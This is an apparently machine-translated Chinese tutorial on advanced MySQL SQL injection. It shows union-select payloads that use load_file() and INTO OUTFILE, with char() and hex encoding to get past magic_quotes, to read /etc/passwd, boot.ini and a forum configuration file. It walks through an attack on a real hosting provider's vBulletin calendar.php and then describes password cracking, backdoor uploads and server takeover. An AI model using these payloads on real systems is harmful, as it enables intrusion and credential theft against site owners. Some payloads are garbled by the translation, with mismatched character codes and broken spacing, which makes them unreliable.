Advanced SQL Injection with MySQL

Text/figure security angel [BST]

Preface

My "SQL Injection with MySQL" (the special topic of "" in July) has provided a comprehensive introduction to MySQL Injection, but there is a function that harms a lot, I didn't mention it in this article, because if you can flexibly apply this function, the security of PHP and even servers will be greatly compromised, since SQL Injection with MySQL was published during the summer vacation, I did not write this article because many new users, students, and people with bad moral character are using it, in fact, this article was completed in early May. After the topic was published, many people have successively transferred to the research on PHP + MYSQL injection, and many new technologies will be explored one after another, the advanced skills we have mastered in this area will also be published one after another. As for the basic things, this article will not mention them.

Details

We know that various built-in MySQL functions can be used in SQL statements. DATABASE (), USER (), SYSTEM_USER (), SESSION_USER (), and CURRENT_USER () are frequently used () these functions are used to obtain some system information. Another function that has been widely used is load_file (). The function is used to read files and return the file content as a string.
Here, we can think of what we can do, that is, read some confidential files, but there are also restrictions:

• The file to be read must be on the server.
• The complete file path must be specified.
• You must have the permission to read and the file must be fully readable.
• The file to be read must be smaller than max_allowed_packet

If the file does not exist or cannot be read for any of the above reasons, the function returns NULL. What is more difficult to meet is the permission. In windows, if NTFS is properly set, the relevant files cannot be read. When the file is accessible only by administrators, users should not consider load_file.

In actual injection, we have two difficulties to solve:

• Absolute physical path
• Construct valid malformed statements

In many PHP programs, when a wrong Query is submitted, if display_errors = on, the program will expose the absolute path of the WEB directory, as long as the path is known, for a PHP program that can be injected, the security of the entire server will be seriously threatened. Constructor statements are meaningless.

Exploitation

Assume that the SQL statement of a program is as follows:

SELECT * FROM article WHERE articleid = $ id

　　Note: The current condition is magic_quotes_gpc = off, and c:/boot. ini is readable.

In this case, we construct $ id:

-1 union select, load_file ('C:/boot. ini ')

Our Query becomes:

SELECT * FROM article WHERE articleid =-1 union select, load_file ('C:/boot. ini ')

The program will display the c:/boot. ini content honestly, but currently there are few hosts with magic_quotes_gpc = off. How can we construct a statement without quotation marks? Those who have read SQL Injection with MySQL certainly know that they use the char () function or convert characters to hexadecimal notation.

　　Note: The current condition is magic_quotes_gpc = on, c:/boot. ini readable.

We construct $ id:

-1 union select 98,111,111,116, 1, load_file (char (99, 58, 47, 46,105,110,105 ))

"Char (111,111,116, 46,105,110,105,)" is the ASCII code of "c:/boot. ini", and our Query becomes:

SELECT * FROM article WHERE articleid =-1 union select 1, 1, 1, load_file (char (99, 58, 47, 98,111,111,116, 46,105,110,105 ))

We can also successfully read boot. the INI file also converts the string to hexadecimal, "c:/boot. the hexadecimal value of ini is "0x633a2f626f6f742e696e69", so the preceding statement can be as follows:

SELECT * FROM article WHERE articleid =-1 union select 1, 1, load_file (0x633a2f626f6f742e696e69)

It's a little short. Let's look at your preferences. You can enter the following query in phpmyadmin or mysql> to study it slowly.

SELECT load_file ([string])

Of course, in practical applications, due to various restrictions, the file content may not be displayed. We can also use into outfile to export the file. Everyone knows how to use it, and I will not talk about the details. Read an instance to explain everything.

Instance

Www. * ** host.cn is a famous FreeBSD host provider in China. We will test it with him because its Forum uses calendar ar. for VBB forums with php problems, I do not need to go anywhere to find websites with vulnerabilities (although they are everywhere ). This is a complete security test. I only get the information, but I have not entered the server.

Here is a bit of code about global. php under the root directory of VBB, as follows:

<? Php
// Get rid of slashes in get/post/cookie data
Function stripslashesarray (& $ arr ){
While (list ($ key, $ val) = each ($ arr )){
If ($ key! = "Templatesused" and $ key! = "Argc" and $ key! = "Argv "){
If (is_string ($ val) AND (strtoupper ($ key )! = $ Key OR ("". intval ($ key) = "$ key "))){
$ Arr ["$ key"] = stripslashes ($ val );
} Else if (is_array ($ val) AND ($ key = 'HTTP _ post_vars' OR $ key = 'HTTP _ get_vars' OR strtoupper ($ key )! = $ Key )){
$ Arr ["$ key"] = stripslashesarray ($ val );
}
}
}
Return $ arr;
}
If (get_magic_quotes_gpc () and is_array ($ GLOBALS )){
If (isset ($ attachment )){
$ GLOBALS ['attachment'] = addslashes ($ GLOBALS ['attachment']);
}
If (isset ($ avatarfile )){
$ GLOBALS ['avatarfile'] = addslashes ($ GLOBALS ['avatarfile']);
}
$ GLOBALS = stripslashesarray ($ GLOBALS );
}

Set_magic_quotes_runtime (0 );

?>

This Code removes the escape characters before all special characters if magic_quotes_gpc is enabled. in ini, the status of magic_quotes_gpc does not affect the single quotes we enter. You can inject them with confidence. Haha.

We know, submit:

/Calendar. php? Action = edit & eventid = 1 union select 1, 1, 1, 1, username, password FROM user WHERE userid = 1

It is possible to obtain the MD5 hash of the user name and password, but it is not displayed for special reasons. However, based on my experience, I know that there is no construction error, therefore, we can read and export data to a file.
Because I accidentally accessed a file containing phpinfo () in advance, I knew the absolute path of the WEB. From the result of the visit to the site, I found that an HTML file was generated by a download system, if the directory does not have the write permission, HTML files cannot be generated, but this is not the focus of this Article. We have the following information:

• Absolute WEB path:/home/4 ngel
• Writable directory path:/home/4 ngel/soft/
• Magic_quotes_gpc = on

Compared with the host root, the admin of the Forum is nothing at all, and I am not interested in the admin of the forum. We want to read the configuration file of the Forum and/etc/passwd, if you know the connection information of MySQL, you can start from here and write webshell or other things. If you know/etc/passwd, we can run the password. Go directly to ssh.

The configuration file of the VBB forum is in/home/4 ngel/forum/admin/config. php and converted into ASCII code. submit:

Calendar. php? Action = edit & eventid = 1 union select 1, 1, 1, 1, 1, load_file (char (47,104,111,109,101, 47, 52,110,103,101,108, 47,102,111,114,117,109, 47, 97,100,109,105,110, 47, 99,111,110,102,105,103, 46,112,104,112) FROM user WHERE userid = 1 into outfile '/home/4 ngel/soft/cfg.txt'

Remember to add a where clause to set a condition. Otherwise, if there are many Forum users, the exported file will be quite large. Or you can simply specify $ eventid as a non-existent value, so you don't need where, just like this:

Calendar. php? Action = edit & eventid =-1 union select 1, 1, 1, 1, 1, load_file (char (47,104,111,109,101, 47, 52,110,103,101,108, 47,102,111,114,117,109, 47, 97,100,109,105,110, 47, 99,111,110,102,105,103, 46,112,104,112) FROM user into outfile '/home/4 ngel/soft/cfg.txt'

Convert/etc/passwd to ASCII code and submit:

Calendar. php? Action = edit & eventid =-1 union select 47,101,116, 47,112, 1, load_file (char (97,115,115,119,100, 99 )) FROM user into outfile '/home/4 ngel/soft/etcpwd.txt'

Note that the following error message is displayed at the top of the Forum:

Warning: mysql_fetch_array (): supplied argument is not a valid MySQL result resource in/home/4 ngel/forum/admin/db_mysql.php on line 154

Experience tells us that the file has been exported successfully and submitted:

Http://www.xxxhost.cn/soft/cfg.txt
Http://www.xxxhost.cn/soft/etcpwd.txt

When the dark night and pig invade into gray, the passwords are displayed one by one, spoofing, logging on to the background, uploading backdoors, and reading config. php, a series of steps, I will get a load_file. Is it very harmful?

I remember discussing in a group that everyone entered the Black and White servers through the 9 *. net website, but there was no way to rush into black and white servers. With the load_file () function, you can access the server where the black and white are located after knowing some information. The process is the same as the above, using show. php vulnerability, directly load_file out of the program configuration file, know mysql information, remote connection, write Database Export file, it is easy to get the Server admin.

Postscript

I have never dared to release the product because it is too harmful. I believe some people in China know it too. It's just not public. After repeated consideration, I decided to release it. I hope that you will not perform any destructive operations on domestic sites. Thank you for your cooperation!